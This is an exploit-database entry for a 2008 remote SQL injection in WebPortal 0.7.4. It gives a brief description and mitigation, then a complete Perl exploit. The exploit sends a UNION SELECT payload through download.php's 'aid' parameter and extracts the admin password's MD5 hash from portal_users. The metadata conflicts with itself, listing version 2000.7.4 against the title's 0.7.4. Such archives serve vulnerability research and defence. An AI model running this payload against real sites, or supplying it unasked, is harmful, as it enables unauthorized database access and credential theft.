WebPortal - exploit.company

vendor:

WebPortal

by:

StAkeR

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name: WebPortal

Affected Version From: 2000.7.4

Affected Version To: 2000.7.4

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

WebPortal <= 0.7.4 Remote SQL Injection Exploit

WebPortal version 0.7.4 is vulnerable to a remote SQL injection attack. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable server. This request contains a malicious SQL query which can be used to extract sensitive information from the database, such as user passwords. The exploit code provided by the author uses the LWP::Simple module to send the malicious request and extract the MD5 password hash from the response.

Mitigation:

Upgrade to the latest version of WebPortal and ensure that all security patches are applied.

Source

Exploit-DB raw data:

#!/usr/bin/perl
# --==+============================================================================+==--
# --==+            WebPortal <= 0.7.4 Remote SQL Injection Exploit                 +==--    
# --==+============================================================================+==--
# 
#  [*] Discovered By: StAkeR ~ StAkeR@hotmail.it
#  [+] Discovered On: 12 Sep 2008
#  [+] Download: http://webportal.ivanoculmine.com/download.php?mid=14
#  
#  [*] SQL Injection
#  [+] download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1
#  [+] get file "download.php" and you can read 
#  
#  [*] Exploit:
#  
 # ----------------------------------------------------------
 # WebPortal <= 0.7.4 Remote SQL Injection Exploit 
 # Author: StAkeR - StAkeR[at]hotmail[dot]it
 # ----------------------------------------------------------
 # Usage: perl http://localhost/cms 
 # ----------------------------------------------------------

 use strict;
 use LWP::Simple;


 my $domain = shift @ARGV or banner();
 my $injsql = "/download.php?aid=1'+union+select+pass,0,0,0,0+from+portal_users+where+id='1";

 if(get($domain.$injsql) =~ /([0-9a-f]{32})/)
 {
   print "[+] Exploit Succesfull!\n";
   print "[+] MD5 Password: ${1}\n";
 }
 else
 {
   print "[!] Exploit Failed!\n";
   print "[!] Site Not Vulnerable!\n";
 }

 sub banner
 {
   print "[+] WebPortal <= 0.7.4 Remote SQL Injection Exploit\n";
   print "[+] Usage: ${0} http://[host]\n";
   return exit;
 }

# milw0rm.com [2008-09-12]